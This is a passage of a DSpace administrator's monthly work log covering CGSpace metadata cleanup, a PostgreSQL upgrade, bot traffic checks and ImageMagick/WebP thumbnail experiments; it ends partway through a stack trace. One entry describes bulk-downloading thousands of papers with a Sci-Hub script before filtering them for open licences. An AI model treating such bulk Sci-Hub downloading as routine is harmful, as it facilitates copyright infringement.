with requests.get(request_url, stream=True, headers=headers) as r:
    if r.status_code == 200:
        with open("article.pdf", "wb") as f:
            for chunk in r.iter_content(chunk_size=1024*1024):
                f.write(chunk)
```
- The question is, how do we know if a DOI is Elsevier or not...
- CGIAR Repositories Working Group meeting
- We discussed controlled vocabularies for funders
- I suggested checking our combined lists against Crossref and ROR
- Export a list of donors from `cg.contributor.donor` on CGSpace:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=248) to /tmp/2023-03-16-donors.txt;
COPY 1521
```
- Then resolve them against Crossref's funders API:
```console
$ ./ilri/crossref_funders_lookup.py -e fuuuu@cgiar.org -i /tmp/2023-03-16-donors.txt -o ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv -d
$ csvgrep -c matched -m true ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv | wc -l
472
$ sed 1d ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv | wc -l
1521
```
- That's a 31% hit rate, but I see some simple things like "Bill and Melinda Gates Foundation" instead of "Bill & Melinda Gates Foundation"
## 2023-03-17
- I did the same lookup of CGSpace donors on ROR's 2022-12-01 data dump:
```console
$ ./ilri/ror_lookup.py -i /tmp/2023-03-16-donors.txt -o ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv -r v1.15-2022-12-01-ror-data.json
$ csvgrep -c matched -m true ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv | wc -l
407
$ sed 1d ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv | wc -l
1521
```
- That's a 26.7% hit rate
- As for the number of funders in each dataset
- Crossref has about 34,000
- ROR has 15,000 if "FundRef" data is a proxy for that:
```console
$ grep -c -rsI FundRef v1.15-2022-12-01-ror-data.json
15162
```
- On a related note, I remembered that DOI.org has a list of DOI prefixes and publishers: https://doi.crossref.org/getPrefixPublisher
- In Python I can look up publishers by prefix easily, here with a list comprehension:
```console
In [10]: [publisher for publisher in publishers if '10.3390' in publisher['prefixes']]
Out[10]:
[{'prefixes': ['10.1989', '10.32545', '10.20944', '10.3390', '10.35995'],
'name': 'MDPI AG',
'memberId': 1968}]
```
- And in OpenRefine, if I create a new column based on the DOI using Jython:
```python
import json
with open("/home/aorth/src/git/DSpace/publisher-doi-prefixes.json", "rb") as f:
    publishers = json.load(f)
doi_prefix = value.split("/")[3]
publisher = [publisher for publisher in publishers if doi_prefix in publisher['prefixes']]
return publisher[0]['name']
```
- ... though this is very slow and hung OpenRefine when I tried it
- I added the ability to overwrite multiple bitstream formats at once in `post_bitstreams.py`:
```console
$ ./ilri/post_bitstreams.py -i test.csv -u https://dspacetest.cgiar.org/rest -e fuuu@example.com -p 'fffnjnjn' -d -s 2B40C7C4E34CEFCF5AFAE4B75A8C52E2 --overwrite JPEG --overwrite PNG -n
Session valid: 2B40C7C4E34CEFCF5AFAE4B75A8C52E2
Opened test.csv
384142cb-58b9-4e64-bcdc-0a8cc34888b3: checking for existing bitstreams in THUMBNAIL bundle
> (DRY RUN) Deleting bitstream: IFPRI Malawi_Maize Market Report_February_202_anonymous.pdf.jpg (16883cb0-1fc8-4786-a04f-32132e0617d4)
> (DRY RUN) Deleting bitstream: AgroEcol_Newsletter_2.png (7e9cd434-45a6-4d55-8d56-4efa89d73813)
> (DRY RUN) Uploading file: 10568-129666.pdf.jpg
```
- I learned how to use Python's built-in `logging` module and it simplifies all my debug and info printing
- I re-factored a few scripts to use the new logging (a minimal sketch of the setup is below)
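- The setup is basically this pattern (a sketch, not the exact code from my scripts):
```python
import logging

logger = logging.getLogger(__name__)
logging.basicConfig(format="[%(levelname)s] %(message)s", level=logging.INFO)

debug = True  # stand-in for an argparse --debug flag
if debug:
    logger.setLevel(logging.DEBUG)

logger.debug("Looking up DOI on Crossref...")
logger.info("Updated 42 items")
```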
## 2023-03-18
- I applied changes for publishers on 16,000 items in batches of 5,000
- While working on my `post_bitstreams.py` script I realized the Tomcat Crawler Session Manager valve that groups bot user agents into sessions is causing my login to fail the first time, every time
- I've disabled it for now and will check the Munin session graphs after some time to see if it makes a difference
- In any case I have much better spider user agent lists in DSpace now than I did years ago when I started using the Crawler Session Manager valve
## 2023-03-19
- Start a harvest on AReS
## 2023-03-20
- Minor updates to a few of my DSpace Python scripts to fix the logging
- Minor updates to some records for Mazingira reported by Sonja
- Upgrade PostgreSQL on DSpace Test from version 12 to 14, the same way I did from 10 to 12 last year:
- First, I installed the new version of PostgreSQL via the Ansible playbook scripts
- Then I stopped Tomcat and all PostgreSQL clusters and used `pg_upgrade` to upgrade the old version:
```console
# systemctl stop tomcat7
# pg_ctlcluster 12 main stop
# tar -cvzpf var-lib-postgresql-12.tar.gz /var/lib/postgresql/12
# tar -cvzpf etc-postgresql-12.tar.gz /etc/postgresql/12
# pg_ctlcluster 14 main stop
# pg_dropcluster 14 main
# pg_upgradecluster 12 main
# pg_ctlcluster 14 main start
```
- After that I [re-indexed the database indexes using a query](https://adamj.eu/tech/2021/04/13/reindexing-all-tables-after-upgrading-to-postgresql-13/):
```console
$ su - postgres
$ cat /tmp/generate-reindex.sql
SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
FROM pg_class C
LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
WHERE nspname = 'public'
AND C.relkind = 'r'
AND nspname !~ '^pg_toast'
ORDER BY pg_total_relation_size(C.oid) ASC;
$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
$ <trim the extra stuff from /tmp/reindex.sql>
$ psql dspace < /tmp/reindex.sql
```
- The index on `metadatavalue` shrunk by 90MB, and others a bit less
- This is nice, but not as drastic as I noticed last year when upgrading to PostgreSQL 12
## 2023-03-21
- Leigh sent me a list of IFPRI authors with ORCID identifiers so I combined them with our list and resolved all their names with `resolve_orcids.py`
- It adds 154 new ORCID identifiers
- I did a follow up to the publisher names from last week using the list from doi.org
- Last week I only updated items with a DOI that had *no* publisher, but now I was curious to see how our existing publisher information compared
- I checked a dozen or so manually and, other than CIFOR/ICRAF and CIAT/Alliance, the metadata was better than our existing data, so I overwrote them
- I spent some time trying to figure out how to get ssimulacra2 running so I could compare thumbnails in JPEG and WebP
- I realized that we can't directly compare JPEG to WebP; we need to convert to JPEG/WebP, then convert each to lossless PNG
- Also, we shouldn't be comparing the resulting images against each other, but rather against the original, so I also need a straight PDF-to-lossless-PNG conversion
- After playing with WebP at Q82 and Q92, I see it has lower ssimulacra2 scores than JPEG Q92 for the dozen test files
- Could it just be something with ImageMagick?
## 2023-03-22
- I updated csv-metadata-quality to use pandas 2.0.0rc1 and everything seems to work...?
- So the issues with nulls (isna) when I tried the first release candidate a few weeks ago were resolved?
- Meeting with Jawoo and others about a "ChatGPT-like" thing for CGIAR data using CGSpace documents and metadata
## 2023-03-23
- Add a missing IFPRI ORCID identifier to CGSpace and tag his items on CGSpace
- A super unscientific comparison between csv-metadata-quality's pytest regimen using Pandas 1.5.3 and Pandas 2.0.0rc1
- The data was gathered using [rusage](https://justine.lol/rusage), and this is the results of the last of three consecutive runs:
```
# Pandas 1.5.3
RL: took 1,585,999µs wall time
RL: ballooned to 272,380kb in size
RL: needed 2,093,947µs cpu (25% kernel)
RL: caused 55,856 page faults (100% memcpy)
RL: 699 context switches (1% consensual)
RL: performed 0 reads and 16 write i/o operations
# Pandas 2.0.0rc1
RL: took 1,625,718µs wall time
RL: ballooned to 262,116kb in size
RL: needed 2,148,425µs cpu (24% kernel)
RL: caused 63,934 page faults (100% memcpy)
RL: 461 context switches (2% consensual)
RL: performed 0 reads and 16 write i/o operations
```
- So it seems that Pandas 2.0.0rc1 took ten megabytes less RAM... interesting to see that the PyArrow-backed dtypes make a measurable difference even on my small test set
- I should try to compare runs of larger input files
## 2023-03-24
- I added a Flyway SQL migration for the PNG bitstream format registry changes on DSpace 7.6
## 2023-03-26
- There seems to be a slightly high load on CGSpace
- I don't see any locks in PostgreSQL, but there's some new bot I have never heard of:
```console
92.119.18.13 - - [26/Mar/2023:18:41:47 +0200] "GET /handle/10568/16500/discover?filtertype_0=impactarea&filter_relational_operator_0=equals&filter_0=Climate+adaptation+and+mitigation&filtertype=sdg&filter_relational_operator=equals&filter=SDG+11+-+Sustainable+cities+and+communities HTTP/2.0" 200 7856 "-" "colly - https://github.com/gocolly/colly"
```
- In the last week I see a handful of IPs making requests with this agent:
```console
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2,3,4,5,6,7}.gz | grep gocolly | awk '{print $1}' | sort | uniq -c | sort -h
2 194.233.95.37
4304 92.119.18.142
9496 5.180.208.152
27477 92.119.18.13
```
- Most of these come from Packethub S.A. / ASN 62240 (CLOUVIDER Clouvider - Global ASN, GB)
- Oh, I've apparently seen this user agent before, as it is in our ILRI spider user agent overrides
- I exported CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-03-27
- The harvest on AReS was incredibly slow, and I stopped it about halfway through after twelve hours
- Then I relied on the plugins to get missing items, which caused a high load on the server but actually worked fine
- Continue working on thumbnails on DSpace
## 2023-03-28
- Regarding ImageMagick there are a few things I've learned
- The `-quality` setting does different things for different output formats, see: https://imagemagick.org/script/command-line-options.php#quality
- The `-compress` setting controls the compression algorithm for image data, and is unrelated to lossless/lossy
- On that note, `-compress lossless` for JPEGs refers to Lossless JPEG, which is not well defined or supported and should be avoided
- See: https://imagemagick.org/script/command-line-options.php#compress
- The way DSpace currently does its supersampling by exporting to a JPEG, then making a thumbnail of the JPEG, is a double lossy operation
- We should be exporting to something lossless like PNG, PPM, or MIFF, then making a thumbnail from that
- The PNG format is always lossless so the `-quality` setting controls compression and filtering, but has no effect on the appearance or signature of PNG images
- You can use `-quality n` with WebP's `-define webp:lossless=true`, but I'm not sure about the interaction between ImageMagick quality and WebP lossless...
- Also, if converting from a lossless format to WebP lossless in the same command, ImageMagick will ignore quality settings
- The MIFF format is useful for piping between ImageMagick commands, but it is also lossless and the quality setting is ignored
- You can use a format specifier when piping between ImageMagick commands without writing a file
- For example, I want to create a lossless PNG from a distorted JPEG for comparison:
```console
$ magick convert reference.jpg -quality 85 jpg:- | convert - distorted-lossless.png
```
- If I convert the JPEG to PNG directly it will ignore the quality setting, so I set the quality and the output format, then pipe it to ImageMagick again to convert to lossless PNG
- In an attempt to quantify the generation loss from DSpace's "JPG JPG" method of creating thumbnails I wrote a script called `generation-loss.sh` to test it against a new "PNG JPG" method (both sketched below)
- With my sample set of seventeen PDFs from CGSpace I found that _the "JPG JPG" method of thumbnailing results in scores an average of 1.6% lower than with the "PNG JPG" method_.
- The average file size with _the "PNG JPG" method was only 200 bytes larger_.
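- Roughly, the two pipelines being compared look like this (a sketch with illustrative density and thumbnail sizes, not the exact `generation-loss.sh` commands):
```console
$ # "JPG JPG" (what DSpace does now): lossy supersample, then lossy thumbnail
$ magick convert -density 144 10568-103447.pdf\[0\] -flatten supersample.jpg
$ magick convert supersample.jpg -thumbnail 500x500 thumbnail-jpg-jpg.jpg
$ # "PNG JPG": lossless supersample, then lossy thumbnail
$ magick convert -density 144 10568-103447.pdf\[0\] -flatten supersample.png
$ magick convert supersample.png -thumbnail 500x500 thumbnail-png-jpg.jpg
```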
- In my brief testing, the relationship between ImageMagick's `-quality` setting and WebP's `-define webp:lossless=true` setting is completely unpredictable:
```console
$ magick convert img/10568-103447.pdf.png /tmp/10568-103447.webp
$ magick convert img/10568-103447.pdf.png -define webp:lossless=true /tmp/10568-103447-lossless.webp
$ magick convert img/10568-103447.pdf.png -define webp:lossless=true -quality 50 /tmp/10568-103447-lossless-q50.webp
$ magick convert img/10568-103447.pdf.png -quality 10 -define webp:lossless=true /tmp/10568-103447-lossless-q10.webp
$ magick convert img/10568-103447.pdf.png -quality 90 -define webp:lossless=true /tmp/10568-103447-lossless-q90.webp
$ ls -l /tmp/10568-103447*
-rw-r--r-- 1 aorth aorth 359258 Mar 28 21:16 /tmp/10568-103447-lossless-q10.webp
-rw-r--r-- 1 aorth aorth 303850 Mar 28 21:15 /tmp/10568-103447-lossless-q50.webp
-rw-r--r-- 1 aorth aorth 296832 Mar 28 21:16 /tmp/10568-103447-lossless-q90.webp
-rw-r--r-- 1 aorth aorth 299566 Mar 28 21:13 /tmp/10568-103447-lossless.webp
-rw-r--r-- 1 aorth aorth 190718 Mar 28 21:13 /tmp/10568-103447.webp
```
- I'm curious to see a comparison between the ImageMagick `-define webp:emulate-jpeg-size=true` (aka `-jpeg_like` in cwebp) option compared to normal lossy WebP quality:
```console
$ for q in 70 80 90; do magick convert img/10568-103447.pdf.png -quality $q -define webp:emulate-jpeg-size=true /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp; done
$ for q in 70 80 90; do magick convert /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp.png; done
$ for q in 70 80 90; do ssimulacra2 img/10568-103447.pdf.png /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp.png 2>/dev/null; done
81.29082887
84.42134524
85.84458964
$ for q in 70 80 90; do magick convert img/10568-103447.pdf.png -quality $q /tmp/10568-103447-lossy-q${q}.webp; done
$ for q in 70 80 90; do magick convert /tmp/10568-103447-lossy-q${q}.webp /tmp/10568-103447-lossy-q${q}.webp.png; done
$ for q in 70 80 90; do ssimulacra2 img/10568-103447.pdf.png /tmp/10568-103447-lossy-q${q}.webp.png 2>/dev/null; done
77.25789006
80.79140936
84.79108246
```
- Using `-define webp:method=6` (versus default 4) gets a ~0.5% increase on ssimulacra2 score
## 2023-03-29
- Looking at the `-define webp:near-lossless=$q` option in ImageMagick and I don't think it's working:
```console
$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -define webp:near-lossless=$q -verbose /tmp/10568-103447-near-lossless-q${q}.webp; done
data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q20.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q40.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q60.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.090u 0:00.043
data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q80.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.090u 0:00.043
data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q90.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
```
- The file sizes are all the same...
- If I try with `-quality $q` it works:
```console
$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -quality $q -verbose /tmp/10568-103447-q${q}.webp; done
data/10568-103447.pdf[0]=>/tmp/10568-103447-q20.webp PDF 595x842 595x842+0+0 16-bit sRGB 52602B 0.080u 0:00.045
data/10568-103447.pdf[0]=>/tmp/10568-103447-q40.webp PDF 595x842 595x842+0+0 16-bit sRGB 64604B 0.090u 0:00.045
data/10568-103447.pdf[0]=>/tmp/10568-103447-q60.webp PDF 595x842 595x842+0+0 16-bit sRGB 73584B 0.080u 0:00.045
data/10568-103447.pdf[0]=>/tmp/10568-103447-q80.webp PDF 595x842 595x842+0+0 16-bit sRGB 88652B 0.090u 0:00.045
data/10568-103447.pdf[0]=>/tmp/10568-103447-q90.webp PDF 595x842 595x842+0+0 16-bit sRGB 113186B 0.100u 0:00.049
```
- I don't see this mentioned in any existing ImageMagick GitHub issues, so I guess I have to file a bug
- I first [asked a question on their discussion board](https://github.com/ImageMagick/ImageMagick/discussions/6204) because I see that the near-lossless option should have been added to ImageMagick sometime after 2020 according to another discussion
- Meeting with Maria about the Alliance metadata on CGSpace
- As the Alliance is not a legal entity they want to reflect that somehow in CGSpace
- We discussed updating all metadata, but since so many documents issued in the last few years indicate the Alliance inside them and as affiliations in journal article acknowledgements, etc., we decided it is not the best option
- Instead, we propose to:
- Remove `Alliance of Bioversity International and CIAT` from the controlled vocabulary for affiliations ASAP
- Add `Bioversity International and the International Center for Tropical Agriculture` to the controlled vocabulary for affiliations ASAP
- Add a prominent note to the item page for every item in the Alliance community via a custom XMLUI theme (Maria and the Alliance publishing team to send the text)
## 2023-03-30
- The ImageMagick developers confirmed [my bug report](https://github.com/ImageMagick/ImageMagick/discussions/6204) and created a patch on master
- I'm not entirely sure how it works, but the developer seemed to imply we can use lossless mode plus a quality?
```console
$ magick convert -flatten data/10568-103447.pdf\[0\] -define webp:lossless=true -quality 90 /tmp/10568-103447.pdf.webp
```
- Now I see a difference between near-lossless and normal quality mode:
```console
$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -define webp:lossless=true -quality $q /tmp/10568-103447-near-lossless-q${q}.webp; done
$ ls -l /tmp/10568-103447-near-lossless-q*
-rw-r--r-- 1 aorth aorth 108186 Mar 30 11:36 /tmp/10568-103447-near-lossless-q20.webp
-rw-r--r-- 1 aorth aorth 97170 Mar 30 11:36 /tmp/10568-103447-near-lossless-q40.webp
-rw-r--r-- 1 aorth aorth 97382 Mar 30 11:36 /tmp/10568-103447-near-lossless-q60.webp
-rw-r--r-- 1 aorth aorth 106090 Mar 30 11:36 /tmp/10568-103447-near-lossless-q80.webp
-rw-r--r-- 1 aorth aorth 105926 Mar 30 11:36 /tmp/10568-103447-near-lossless-q90.webp
$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -quality $q /tmp/10568-103447-q${q}.webp; done
$ ls -l /tmp/10568-103447-q*
-rw-r--r-- 1 aorth aorth 52602 Mar 30 11:37 /tmp/10568-103447-q20.webp
-rw-r--r-- 1 aorth aorth 64604 Mar 30 11:37 /tmp/10568-103447-q40.webp
-rw-r--r-- 1 aorth aorth 73584 Mar 30 11:37 /tmp/10568-103447-q60.webp
-rw-r--r-- 1 aorth aorth 88652 Mar 30 11:37 /tmp/10568-103447-q80.webp
-rw-r--r-- 1 aorth aorth 113186 Mar 30 11:37 /tmp/10568-103447-q90.webp
```
- But after reading the source code in `coders/webp.c` I am not sure I understand, so I asked for clarification in the discussion
- Both Bosede and Abenet said mapping on CGSpace is taking a long time; I don't see any stuck locks, so I decided to quickly restart PostgreSQL
## 2023-03-31
- Meeting with Daniel and Naim from Alliance in Cali about CGSpace metadata, TIP, etc
<!-- vim: set sw=2 ts=2: -->

content/posts/2023-04.md Normal file

---
title: "April, 2023"
date: 2023-04-02T08:19:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-04-02
- Run all system updates on CGSpace and reboot it
- I exported CGSpace to CSV to check for any missing Initiative collection mappings
- I also did a check for missing country/region mappings with csv-metadata-quality
- Start a harvest on AReS
<!--more-->
- I'm starting to get annoyed at my shell script for doing ImageMagick tests and am looking to re-write it in something object-oriented like Python
- There doesn't seem to be an official ImageMagick Python binding on pypi.org, perhaps I can use [Wand](https://docs.wand-py.org)?
- Testing Wand in Python:
```python
from wand.image import Image
with Image(filename='data/10568-103447.pdf[0]', resolution=144) as first_page:
print(first_page.height)
```
- I spent more time re-working my thumbnail scripts to compare the resized images and other minor changes
- I am realizing that doing the thumbnails directly from the source improves the ssimulacra2 score by 1-3 percentage points compared to DSpace's method of creating a lossy supersample followed by a lossy resized thumbnail
## 2023-04-03
- The harvest on AReS that I started yesterday never finished, and actually seems to have died...
- Also, Fabio and Patrizio from Alliance emailed me to ask if there is something wrong with the REST API because they are having problems
- I stopped the harvest and started the plugins to get the remaining items via the sitemap...
## 2023-04-04
- Presentation about CGSpace metadata, controlled vocabularies, and curation to Pooja's communications and development team at UNEP
- I uploaded the presentation to CGSpace here: https://hdl.handle.net/10568/129896
- Someone from the system organization contacted me to ask how to download a few thousand PDFs from a spreadsheet with DOIs and Handles:
```console
$ csvcut -c Handle ~/Downloads/2023-04-04-Donald.csv \
| sed \
-e 1d \
-e 's_https://hdl.handle.net/__' \
-e 's_https://cgspace.cgiar.org/handle/__' \
-e 's_http://hdl.handle.net/__' \
| sort -u > /tmp/handles.txt
```
- Then I used the `get_dspace_pdfs.py` script to download them
## 2023-04-05
- After some cleanup on Donald's DOIs I started the `get_scihub_pdfs.py` script
## 2023-04-06
- I did some more work to cleanup and streamline my next generation of DSpace thumbnail testing scripts
- I think I found a bug in ImageMagick 7.1.1.5 where CMYK to sRGB conversion fails if we use image operations like `-density` or `-define` before reading the input file
- I started [a discussion on the ImageMagick GitHub](https://github.com/ImageMagick/ImageMagick/discussions/6234) to ask
- Yesterday I started downloading the rest of the PDFs from Donald, those that had DOIs
- As a measure of caution, I extracted the list of DOIs and used my `crossref_doi_lookup.py` script to get their licenses from Crossref:
```console
$ ./ilri/crossref_doi_lookup.py -e xxxx@i.org -i /tmp/dois.txt -o /tmp/donald-crossref-dois.csv -d
```
- Then I did some CSV manipulation to extract the DOIs that were Creative Commons licensed, excluding any that were "No Derivatives", and re-formatting the DOIs:
```console
$ csvcut -c doi,license /tmp/donald-crossref-dois.csv \
| csvgrep -c license -m 'creativecommons' \
| csvgrep -c license -i -r 'by-(nd|nc-nd)' \
| sed -e 's_^10_https://doi.org/10_' \
-e 's/\(am\|tdm\|unspecified\|vor\): //' \
| tee /tmp/donald-open-dois.csv \
| wc -l
4268
```
- From those I filtered for the DOIs for which I had downloaded PDFs (via the `filename` column in the Sci-Hub script's output) and copied them to a separate directory:
```console
$ for file in $(csvjoin -c doi /tmp/donald-doi-pdfs.csv /tmp/donald-open-dois.csv | csvgrep -c filename -i -r '^$' | csvcut -c filename | sed 1d); do cp --reflink=always "$file" "creative-commons-licensed/$file"; done
```
- I used BTRFS copy-on-write via reflinks to make sure I didn't duplicate the files :-D
- I ran out of time and had to stop the process after around 3,127 PDFs
- I zipped them up and sent them to the others, along with a CSV of the DOIs, PDF filenames, and licenses
## 2023-04-17
- Abenet noticed a weird issue with [this item](https://cgspace.cgiar.org/handle/10568/75611)
- The item has metadata, but the page is blank
- When I try to edit the item's authorization policies in XMLUI I get a NullPointerException:
```
Java stacktrace: java.lang.NullPointerException
at org.dspace.app.xmlui.aspect.administrative.authorization.EditItemPolicies.addBody(EditItemPolicies.java:166)
at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:234)
at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy201.startElement(Unknown Source)
at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy203.startElement(Unknown Source)
at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy203.startElement(Unknown Source)
at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy203.startElement(Unknown Source)
at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
at org.apache.cocoon.components.sax.AbstractXMLByteStreamInterpreter.parse(AbstractXMLByteStreamInterpreter.java:117)
at org.apache.cocoon.components.sax.XMLByteStreamInterpreter.deserialize(XMLByteStreamInterpreter.java:44)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:324)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:326)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:326)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
